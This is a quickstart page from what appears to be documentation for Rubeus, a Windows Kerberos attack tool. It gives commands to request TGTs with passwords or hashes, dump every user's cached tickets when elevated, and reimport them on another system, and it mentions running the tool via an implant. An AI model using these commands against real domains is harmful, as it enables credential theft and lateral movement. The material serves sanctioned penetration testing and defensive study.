Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/ghostpack/rubeus/llms.txt

Use this file to discover all available pages before exploring further.

Rubeus is a Windows command-line executable that communicates directly with Active Directory domain controllers over Kerberos port 88. This guide walks you through obtaining the binary, verifying it works, requesting your first TGT, and inspecting the tickets cached in your current logon session — all in a few minutes.

Prerequisites

Before you begin, confirm you have the following:
  • A Windows machine joined to an Active Directory domain (or network access to a domain controller)
  • .NET Framework 3.5 or 4.0 installed (present by default on most domain-joined Windows machines)
  • A valid domain user account and its password (or NTLM/AES hash)
  • Rubeus.exe obtained by compiling from source (see Building from Source) or from a trusted release
No elevated privileges are needed to request a TGT for your own account or to apply it to your current logon session. Operations such as dumping tickets for all users or applying tickets to another logon session do require elevation.

Steps

1
Display help
2
Run Rubeus.exe with no arguments to verify the binary works and display the full usage reference:
3
Rubeus.exe
4
A successful run prints the Rubeus banner and the complete command list. If you see an error about a missing .NET runtime, install .NET Framework 4.0 from Windows Update or your enterprise software catalog.
5
Request a TGT with a password
6
Use asktgt to request a Ticket Granting Ticket from the KDC and inject it directly into your current logon session with /ptt:
7
Rubeus.exe asktgt /user:jdoe /password:Password123 /domain:CORP.LOCAL /ptt
8
On success, Rubeus prints a base64-encoded .kirbi blob and confirms [+] Ticket successfully imported!. The TGT is now active in your logon session and will be used automatically for subsequent Kerberos authentications.
9
You can also authenticate using an NTLM (RC4) hash instead of a password:
10
Rubeus.exe asktgt /user:jdoe /rc4:NTLMHASHHERE /domain:CORP.LOCAL /ptt
11
Or with an AES-256 key for a lower-noise exchange:
12
Rubeus.exe asktgt /user:jdoe /aes256:AES256HASHHERE /domain:CORP.LOCAL /ptt
13
List current tickets
14
Use triage to display a summary table of all Kerberos tickets cached in your current logon session:
15
Rubeus.exe triage
16
If you are running as an elevated process, triage lists tickets across all logon sessions on the host. The output shows the ticket owner, service name, encryption type, and expiry time at a glance.
17
Dump ticket data
18
Use dump to extract the full base64-encoded .kirbi blobs for all tickets in the current logon session:
19
Rubeus.exe dump
20
When elevated, dump extracts tickets for every user on the system. The base64 output can be decoded back to a .kirbi file with:
21
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("aa..."))
22
You can then use that .kirbi with Rubeus.exe ptt /ticket:ticket.kirbi to import it on another system.

Global Flags

These flags apply to nearly every Rubeus command and are worth knowing before exploring further:
FlagDescription
/nowrapPrevents base64 ticket blobs from being line-wrapped. Use this when piping output or saving blobs to pass between tools.
/debugOutputs ASN.1 structure debugging information. Useful when diagnosing unexpected KDC responses.
/consoleoutfile:C:\path\out.txtRedirects all console output (stdout and stderr) to the specified file.
The /nowrap flag is especially important when copying a base64 ticket blob from the console to pass as a /ticket: argument to another command. Without it, the wrapped newlines will cause the base64 decode to fail.
Use /consoleoutfile:C:\Temp\rubeus.log when running Rubeus through an implant or remote shell that does not preserve console formatting. All output — including error messages — is written to the file, making it easy to review results asynchronously.

Build docs developers (and LLMs) love